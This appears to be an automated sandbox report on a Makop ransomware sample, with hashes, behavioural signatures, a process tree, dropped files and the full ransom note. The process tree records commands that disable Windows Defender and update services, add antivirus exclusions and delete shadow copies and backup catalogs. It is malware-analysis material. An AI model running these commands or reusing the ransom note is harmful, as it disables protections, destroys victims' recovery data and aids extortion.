Analysis

  • max time kernel
    136s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/09/2022, 04:04

General

  • Target

    HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe

  • Size

    1.9MB

  • MD5

    40ec0e62856036983be04f31ce670fb9

  • SHA1

    0d04b8139fe71a1736a8168fbf072df61d7d7bd6

  • SHA256

    48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521

  • SHA512

    1094d49d3fcb757fe2d1c49d1e441ab086f4cff80ffd8572b0017546350838dcba83f102796009d811a360f6825928c13e3697b7dd462627bb83fb92534fc806

  • SSDEEP

    192:z/TeYoeb67sc8+otH8SESePujd2kTCMZehZtzMuuQzBLerxA/GWeGMEd022XbTFi:z/yYoebe5JotHESxjuM63KI

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\readme-warning.txt

Family

makop

Ransom Note
::: Greetings :::
Little FAQ:
.1. Q: Whats Happen? A: Your files have been encrypted and now have the "makop" extension. The file structure was not damaged, we did everything possible so that this could not happen.
.2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in bitcoins.
.3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.
.4. Q: How to contact with you? A: You can write us to our mailbox: [email protected]
.5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.
.6. Q: If I don't want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.
:::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Signatures

  • Makop

    Ransomware family discovered by @VK_Intel in early 2020.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Nirsoft 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 3 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Windows security modification 2 TTPs 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 22 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
        "C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe" /SpecialRun 4101d8 2736
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3124
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2004
    • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
      "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
        "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" n320
        3⤵
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe
          "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4192
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3440
            • C:\Windows\system32\sc.exe
              sc stop windefend
              6⤵
              • Launches sc.exe
              PID:4720
            • C:\Windows\system32\sc.exe
              sc config windefend start= disabled
              6⤵
              • Launches sc.exe
              PID:2340
            • C:\Windows\system32\sc.exe
              sc stop Sense
              6⤵
              • Launches sc.exe
              PID:1260
            • C:\Windows\system32\sc.exe
              sc config Sense start= disabled
              6⤵
              • Launches sc.exe
              PID:612
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              6⤵
              • Launches sc.exe
              PID:3620
            • C:\Windows\system32\sc.exe
              sc config wuauserv start= disabled
              6⤵
              • Launches sc.exe
              PID:3196
            • C:\Windows\system32\sc.exe
              sc stop usosvc
              6⤵
              • Launches sc.exe
              PID:3528
            • C:\Windows\system32\sc.exe
              sc config usosvc start= disabled
              6⤵
              • Launches sc.exe
              PID:3936
            • C:\Windows\system32\sc.exe
              sc stop WaasMedicSvc
              6⤵
              • Launches sc.exe
              PID:1220
            • C:\Windows\system32\sc.exe
              sc config WaasMedicSvc start= disabled
              6⤵
              • Launches sc.exe
              PID:3192
            • C:\Windows\system32\sc.exe
              sc stop SecurityHealthService
              6⤵
              • Launches sc.exe
              PID:2800
            • C:\Windows\system32\sc.exe
              sc config SecurityHealthService start= disabled
              6⤵
              • Launches sc.exe
              PID:1860
            • C:\Windows\system32\sc.exe
              sc stop SDRSVC
              6⤵
              • Launches sc.exe
              PID:2752
            • C:\Windows\system32\sc.exe
              sc config SDRSVC start= disabled
              6⤵
              • Launches sc.exe
              PID:728
            • C:\Windows\system32\sc.exe
              sc stop wscsvc
              6⤵
              • Launches sc.exe
              PID:4200
            • C:\Windows\system32\sc.exe
              sc config wscsvc start= disabled
              6⤵
              • Launches sc.exe
              PID:3228
            • C:\Windows\system32\sc.exe
              sc stop WdiServiceHost
              6⤵
              • Launches sc.exe
              PID:3096
            • C:\Windows\system32\sc.exe
              sc config WdiServiceHost start= disabled
              6⤵
              • Launches sc.exe
              PID:3888
            • C:\Windows\system32\sc.exe
              sc stop WdiSystemHost
              6⤵
              • Launches sc.exe
              PID:4544
            • C:\Windows\system32\sc.exe
              sc config WdiSystemHost start= disabled
              6⤵
              • Launches sc.exe
              PID:1016
            • C:\Windows\system32\sc.exe
              sc stop InstallService
              6⤵
              • Launches sc.exe
              PID:1724
            • C:\Windows\system32\sc.exe
              sc config InstallService Start= disabled
              6⤵
              • Launches sc.exe
              PID:5048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe" -Force
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4556
        • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe
          "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe"
          4⤵
            PID:2736
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1828
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            4⤵
            • Interacts with shadow copies
            PID:1476
          • C:\Windows\system32\wbadmin.exe
            wbadmin delete catalog -quiet
            4⤵
            • Deletes backup catalog
            PID:2044
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3436
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4676
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4108
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:892
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:2092
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:4668

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HEUR-Trojan.MSIL.Crypt.gen-48586ad6d444978aac4736f05bef2751d49929ce24b187da39ddc4d0c8979521.exe.log
    Filesize: 1KB
    MD5: c8ba28b4adef1e31506663447c4fb877
    SHA1: ab07929915ab927500c2fb32757f0512a0fa050e
    SHA256: 589ddf313adbbe748a1d83d08ff4ec49b7cc6d6ca9d756ae38a779efe331add2
    SHA512: 1778691f90f45240ba9460f0eb06c8ab72f845f2b841fdfdeb0da3e8c4e293fb11f40c858369cb7c8f5ea5fe45891b8cf1c968849fc3ce2251f517e0c519906d

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 968cb9309758126772781b83adb8a28f
    SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
    SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
    SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 18KB
    MD5: 37a6f16ed97a62d9dc7f77f022caaa70
    SHA1: c2abfe26b5bb4cb9f74bb4a45d4d5d885490121d
    SHA256: d4c6fd529ccc40f6bfbb1a6618a497d9108082b62d4900c7c03048c40a4c5a02
    SHA512: 94706518a04d4ff7957a2b6735b40f804ecfee0f51524b7003daf15df03d1816347e91e5681a70efd298d6eff316f7e966e45824af998a0dbe274631323f0e6a

  • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\AdvancedRun.exe
    Filesize: 88KB
    MD5: 17fc12902f4769af3a9271eb4e2dacce
    SHA1: 9a4a1581cc3971579574f837e110f3bd6d529dab
    SHA256: 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
    SHA512: 036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\readme-warning.txt
    Filesize: 1KB
    MD5: e217e139ef30c6b01a891a46abdfdfdb
    SHA1: b7fcffce07cbdc0408c8156f22ac6ab0a8c742c9
    SHA256: cb631d734d62dce1742744b81cccd7418c27fa6da089d366378b43c00186598e
    SHA512: a22208a2537138f0b70087b1f0f10972e2ed2feb3ea8ea2f7bc0f7668a4fc1b807aaa7173d04ff04d415c043e1278357d39c7f539b4037ebbc6926e21863d117

  • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat
    Filesize: 8KB
    MD5: b2a5ef7d334bdf866113c6f4f9036aae
    SHA1: f9027f2827b35840487efd04e818121b5a8541e0
    SHA256: 27426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e
    SHA512: 8ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e

  • C:\Users\Admin\AppData\Local\Temp\8f284f7d-68eb-4c98-b306-be1d6bb87186\test.bat.[9C4C1438].[[email protected]].makop
    Filesize: 8KB
    MD5: 263655b1a06d30281358b83adfea8d4e
    SHA1: e070e79d63fce882d648d1af15c8e4247fc25a0f
    SHA256: 145547d6f2dfed7e74bc8abf7c16b1858a9f1d6a6b78817e56d6fae027c4d15d
    SHA512: 867e39e8c7f9bc8a9395c41db013d4648169239fef42db8e0cffe6df2cd6cb8dfc09b039473ab35ad8ddafcf3364f66dcc9b28c6c1d2a931300b221d30088048

  • C:\Users\Admin\AppData\Local\Temp\a46ec569-aaa1-42a3-9448-40176fa40a1f\AdvancedRun.exe
    Filesize: 88KB
    MD5: 17fc12902f4769af3a9271eb4e2dacce
    SHA1: 9a4a1581cc3971579574f837e110f3bd6d529dab
    SHA256: 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
    SHA512: 036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • memory/320-156-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize: 120KB
  • memory/320-158-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize: 120KB
  • memory/320-163-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize: 120KB
  • memory/2004-149-0x0000000006F10000-0x0000000006F2E000-memory.dmp
    Filesize: 120KB
  • memory/2004-141-0x0000000003060000-0x0000000003096000-memory.dmp
    Filesize: 216KB
  • memory/2004-153-0x0000000007EF0000-0x0000000007F86000-memory.dmp
    Filesize: 600KB
  • memory/2004-159-0x0000000007FB0000-0x0000000007FCA000-memory.dmp
    Filesize: 104KB
  • memory/2004-160-0x0000000007F90000-0x0000000007F98000-memory.dmp
    Filesize: 32KB
  • memory/2004-152-0x0000000007AD0000-0x0000000007ADA000-memory.dmp
    Filesize: 40KB
  • memory/2004-151-0x0000000007A60000-0x0000000007A7A000-memory.dmp
    Filesize: 104KB
  • memory/2004-150-0x0000000008390000-0x0000000008A0A000-memory.dmp
    Filesize: 6.5MB
  • memory/2004-155-0x0000000007EA0000-0x0000000007EAE000-memory.dmp
    Filesize: 56KB
  • memory/2004-142-0x0000000005C10000-0x0000000006238000-memory.dmp
    Filesize: 6.2MB
  • memory/2004-143-0x0000000005AC0000-0x0000000005AE2000-memory.dmp
    Filesize: 136KB
  • memory/2004-148-0x000000006FC40000-0x000000006FC8C000-memory.dmp
    Filesize: 304KB
  • memory/2004-144-0x0000000006240000-0x00000000062A6000-memory.dmp
    Filesize: 408KB
  • memory/2004-145-0x0000000006360000-0x00000000063C6000-memory.dmp
    Filesize: 408KB
  • memory/2004-147-0x0000000006F30000-0x0000000006F62000-memory.dmp
    Filesize: 200KB
  • memory/2004-146-0x0000000006970000-0x000000000698E000-memory.dmp
    Filesize: 120KB
  • memory/2736-203-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize: 120KB
  • memory/3972-134-0x0000000006FD0000-0x0000000007574000-memory.dmp
    Filesize: 5.6MB
  • memory/3972-132-0x0000000000A60000-0x0000000000C54000-memory.dmp
    Filesize: 2.0MB
  • memory/3972-133-0x00000000057E0000-0x000000000587C000-memory.dmp
    Filesize: 624KB
  • memory/4556-198-0x000000006FC40000-0x000000006FC8C000-memory.dmp
    Filesize: 304KB